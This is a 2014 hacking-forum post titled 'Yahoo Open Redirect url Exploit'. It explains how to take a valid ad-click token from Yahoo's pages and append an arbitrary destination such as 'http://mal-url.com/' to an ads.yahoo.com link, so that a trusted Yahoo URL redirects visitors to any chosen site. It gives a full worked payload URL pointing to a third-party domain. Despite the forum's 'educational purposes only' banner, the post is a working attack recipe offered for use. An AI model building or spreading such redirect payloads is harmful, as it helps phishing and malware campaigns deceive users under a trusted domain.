Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Yahoo Open Redirect url Exploit

  • 0 Vote(s) - 0 Average


04-29-2014, 06:10 AM #1
Posts:9 Threads:4 Joined:Feb 2014 Reputation: 0
Mood: None
Hello

in first we just need a valid redirect token ex in this url:

Code:
https://ads.yahoo.com/clk?3,eJytjcuKgzAYhZ-mOxFz0QhhFn.qhdCa0jbOiLtUM15GsRRBOk8.Lcj0BfrxLQ6HAwcRbr9JTZkxmFlqLfE5otR6AbpUmDke55xgH7EgDAPqfJo8AiHL8xHyXzIJeCJkUyywImrbyDVL2C6QJDu4qbWJCp.AW4hi9.T6geZhFILH5pbGR.E.S8ufDMdI9ZW3.5KLSvM508mQ3VGX6brf64qWWnVKx6Ts2-HwOvhwnHaerxsCG5w8HE03uHfTTpNbTeMfxhRXnQ==

it is :
Code:
eJytjcuKgzAYhZ-mOxFz0QhhFn.qhdCa0jbOiLtUM15GsRRBOk8.Lcj0BfrxLQ6HAwcRbr9JTZkxmFlqLfE5otR6AbpUmDke55xgH7EgDAPqfJo8AiHL8xHyXzIJeCJkUyywImrbyDVL2C6QJDu4qbWJCp.AW4hi9.T6geZhFILH5pbGR.E.S8ufDMdI9ZW3.5KLSvM508mQ3VGX6brf64qWWnVKx6Ts2-HwOvhwnHaerxsCG5w8HE03uHfTTpNbTeMfxhRXnQ==

and we can get it from the main yahoo.com page from any ads,

then we just add at the end ,http://mal-url.com/
so the exploit will look like:
https://ads.yahoo.com/clk?3,[valid redirect token],http://mal-url.com/
in my case it'll look like:
Code:
https://ads.yahoo.com/clk?3,eJytjcuKgzAYhZ-mOxFz0QhhFn.qhdCa0jbOiLtUM15GsRRBOk8.Lcj0BfrxLQ6HAwcRbr9JTZkxmFlqLfE5otR6AbpUmDke55xgH7EgDAPqfJo8AiHL8xHyXzIJeCJkUyywImrbyDVL2C6QJDu4qbWJCp.AW4hi9.T6geZhFILH5pbGR.E.S8ufDMdI9ZW3.5KLSvM508mQ3VGX6brf64qWWnVKx6Ts2-HwOvhwnHaerxsCG5w8HE03uHfTTpNbTeMfxhRXnQ==,http://zone-t.net

so it'll redirect to http://zone-t.net

[email protected] Biggrinsmiley






Forum Jump:


Users browsing this thread:1 Guest(s)